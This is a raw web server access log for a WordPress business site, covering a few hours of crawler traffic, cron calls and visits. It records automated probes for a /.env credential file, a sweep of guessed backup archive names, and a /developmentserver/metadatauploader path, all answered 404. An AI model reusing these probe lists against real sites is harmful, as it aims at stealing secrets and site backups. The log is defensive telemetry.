204.76.203.212 - - [26/Dec/2025:06:28:34 +0800] "GET / HTTP/1.1" 200 33677 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [26/Dec/2025:06:30:43 +0800] "POST /wp-cron.php?doing_wp_cron=1766701843.7664508819580078125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.156.109.53 - - [26/Dec/2025:06:30:44 +0800] "GET / HTTP/1.1" 200 33676 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
52.167.144.166 - - [26/Dec/2025:06:50:42 +0800] "GET /wp-content/uploads/2025/07/1751864664-Logistics800x500_1.webp HTTP/1.1" 200 76914 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
51.195.215.216 - - [26/Dec/2025:06:51:44 +0800] "GET /2231/ HTTP/1.1" 200 23525 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [26/Dec/2025:07:00:04 +0800] "POST /wp-cron.php?doing_wp_cron=1766703604.2788720130920410156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.157.147.3 - - [26/Dec/2025:07:00:04 +0800] "GET / HTTP/1.1" 200 33676 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Dec/2025:07:00:17 +0800] "GET / HTTP/1.1" 200 33676 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.102 - - [26/Dec/2025:07:12:09 +0800] "GET / HTTP/1.1" 499 0 "-" "python-requests/2.26.0"
36.133.115.36 - - [26/Dec/2025:07:12:09 +0800] "POST /wp-cron.php?doing_wp_cron=1766704329.4623849391937255859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.115.36 - - [26/Dec/2025:07:28:10 +0800] "POST /wp-cron.php?doing_wp_cron=1766705290.4273679256439208984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
46.30.166.243 - - [26/Dec/2025:07:28:10 +0800] "GET /.env HTTP/1.1" 404 8980 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
40.77.167.155 - - [26/Dec/2025:07:30:03 +0800] "GET /wp-content/uploads/2025/07/1751864682-Logistics800x500_2.webp HTTP/1.1" 200 27420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [26/Dec/2025:07:33:05 +0800] "POST /wp-cron.php?doing_wp_cron=1766705585.5718419551849365234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [26/Dec/2025:07:33:05 +0800] "GET / HTTP/1.1" 200 33676 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [26/Dec/2025:07:37:02 +0800] "POST /wp-cron.php?doing_wp_cron=1766705822.3633549213409423828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [26/Dec/2025:07:37:02 +0800] "GET / HTTP/1.1" 200 33676 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [26/Dec/2025:07:54:01 +0800] "POST /wp-cron.php?doing_wp_cron=1766706841.0125730037689208984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.108.119 - - [26/Dec/2025:07:54:01 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
36.133.115.36 - - [26/Dec/2025:07:56:24 +0800] "POST /wp-cron.php?doing_wp_cron=1766706984.0743589401245117187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [26/Dec/2025:07:56:25 +0800] "POST / HTTP/1.1" 200 33676 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
40.77.167.48 - - [26/Dec/2025:07:57:56 +0800] "GET / HTTP/1.1" 200 34110 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [26/Dec/2025:07:58:27 +0800] "POST /wp-cron.php?doing_wp_cron=1766707107.6043610572814941406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
222.254.161.63 - - [26/Dec/2025:07:58:28 +0800] "GET / HTTP/1.0" 200 152268 "-" "-"
36.133.115.36 - - [26/Dec/2025:08:14:19 +0800] "POST /wp-cron.php?doing_wp_cron=1766708058.9832720756530761718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.214.54.147 - - [26/Dec/2025:08:14:19 +0800] "GET / HTTP/1.1" 200 152290 "-" "Mozilla/5.0"
36.133.115.36 - - [26/Dec/2025:08:15:04 +0800] "POST /wp-cron.php?doing_wp_cron=1766708104.4722089767456054687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
120.27.124.135 - - [26/Dec/2025:08:15:04 +0800] "HEAD /website.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:05 +0800] "HEAD /website.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:05 +0800] "HEAD /website.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:06 +0800] "HEAD /website.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:07 +0800] "HEAD /website.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:07 +0800] "HEAD /website.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:08 +0800] "HEAD /website.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:09 +0800] "HEAD /wwwroot.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:09 +0800] "HEAD /wwwroot.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:10 +0800] "HEAD /wwwroot.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:11 +0800] "HEAD /wwwroot.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:11 +0800] "HEAD /wwwroot.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:12 +0800] "HEAD /wwwroot.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:13 +0800] "HEAD /wwwroot.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:13 +0800] "HEAD /1.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:14 +0800] "HEAD /1.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:15 +0800] "HEAD /1.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:15 +0800] "HEAD /1.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:16 +0800] "HEAD /1.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:17 +0800] "HEAD /1.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:17 +0800] "HEAD /1.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:18 +0800] "HEAD /www.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:19 +0800] "HEAD /www.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:19 +0800] "HEAD /www.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:20 +0800] "HEAD /www.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:20 +0800] "HEAD /www.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:21 +0800] "HEAD /www.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:22 +0800] "HEAD /www.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:22 +0800] "HEAD /web.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:23 +0800] "HEAD /web.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:24 +0800] "HEAD /web.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:24 +0800] "HEAD /web.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:25 +0800] "HEAD /web.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:26 +0800] "HEAD /web.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:26 +0800] "HEAD /web.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:27 +0800] "HEAD /admin.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:27 +0800] "HEAD /admin.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:28 +0800] "HEAD /admin.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:29 +0800] "HEAD /admin.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:29 +0800] "HEAD /admin.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:30 +0800] "HEAD /admin.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:31 +0800] "HEAD /admin.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:31 +0800] "HEAD /html.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:32 +0800] "HEAD /html.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:32 +0800] "HEAD /html.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:33 +0800] "HEAD /html.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:34 +0800] "HEAD /html.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:34 +0800] "HEAD /html.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:35 +0800] "HEAD /html.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:36 +0800] "HEAD /back.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:36 +0800] "HEAD /back.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:37 +0800] "HEAD /back.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:38 +0800] "HEAD /back.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:38 +0800] "HEAD /back.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:39 +0800] "HEAD /back.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:39 +0800] "HEAD /back.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:40 +0800] "HEAD /test.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:41 +0800] "HEAD /test.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:41 +0800] "HEAD /test.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:42 +0800] "HEAD /test.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:43 +0800] "HEAD /test.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:43 +0800] "HEAD /test.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:44 +0800] "HEAD /test.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:44 +0800] "HEAD /cqqizhou.com.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:45 +0800] "HEAD /cqqizhou.com.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
36.133.115.36 - - [26/Dec/2025:08:15:46 +0800] "POST /wp-cron.php?doing_wp_cron=1766708146.1175429821014404296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
120.27.124.135 - - [26/Dec/2025:08:15:46 +0800] "HEAD /cqqizhou.com.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:46 +0800] "HEAD /cqqizhou.com.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:47 +0800] "HEAD /cqqizhou.com.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:48 +0800] "HEAD /cqqizhou.com.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:48 +0800] "HEAD /cqqizhou.com.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:49 +0800] "HEAD /cqqizhou_com.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:49 +0800] "HEAD /cqqizhou_com.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:50 +0800] "HEAD /cqqizhou_com.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:51 +0800] "HEAD /cqqizhou_com.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:51 +0800] "HEAD /cqqizhou_com.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:52 +0800] "HEAD /cqqizhou_com.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:53 +0800] "HEAD /cqqizhou_com.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:53 +0800] "HEAD /cqqizhoucom.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:54 +0800] "HEAD /cqqizhoucom.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:55 +0800] "HEAD /cqqizhoucom.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:55 +0800] "HEAD /cqqizhoucom.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:56 +0800] "HEAD /cqqizhoucom.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:56 +0800] "HEAD /cqqizhoucom.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:57 +0800] "HEAD /cqqizhoucom.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:58 +0800] "HEAD /cqqizhou.com.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:58 +0800] "HEAD /cqqizhou.com.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:15:59 +0800] "HEAD /cqqizhou.com.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:00 +0800] "HEAD /cqqizhou.com.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:00 +0800] "HEAD /cqqizhou.com.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:01 +0800] "HEAD /cqqizhou.com.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:01 +0800] "HEAD /cqqizhou.com.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:02 +0800] "HEAD /cqqizhou.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:03 +0800] "HEAD /cqqizhou.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:03 +0800] "HEAD /cqqizhou.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:04 +0800] "HEAD /cqqizhou.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:05 +0800] "HEAD /cqqizhou.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:05 +0800] "HEAD /cqqizhou.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
120.27.124.135 - - [26/Dec/2025:08:16:06 +0800] "HEAD /cqqizhou.tar.tgz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
36.133.115.36 - - [26/Dec/2025:08:22:59 +0800] "POST /wp-cron.php?doing_wp_cron=1766708579.7593541145324707031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
110.249.202.54 - - [26/Dec/2025:08:22:59 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [26/Dec/2025:08:34:33 +0800] "POST /wp-cron.php?doing_wp_cron=1766709273.2760579586029052734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.108.119 - - [26/Dec/2025:08:34:33 +0800] "HEAD /developmentserver/metadatauploader HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36"
36.133.115.36 - - [26/Dec/2025:09:11:11 +0800] "POST /wp-cron.php?doing_wp_cron=1766711471.1770410537719726562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
51.68.247.199 - - [26/Dec/2025:09:11:11 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
198.244.168.141 - - [26/Dec/2025:09:11:14 +0800] "GET / HTTP/1.1" 200 34110 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
40.77.167.156 - - [26/Dec/2025:09:12:19 +0800] "GET /2163/ HTTP/1.1" 200 23792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
220.181.108.104 - - [26/Dec/2025:09:19:49 +0800] "GET /services/processing/ HTTP/1.1" 200 22969 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
91.224.92.121 - - [26/Dec/2025:09:21:24 +0800] "OPTIONS / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36"
36.133.115.36 - - [26/Dec/2025:09:21:36 +0800] "POST /wp-cron.php?doing_wp_cron=1766712096.2283511161804199218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
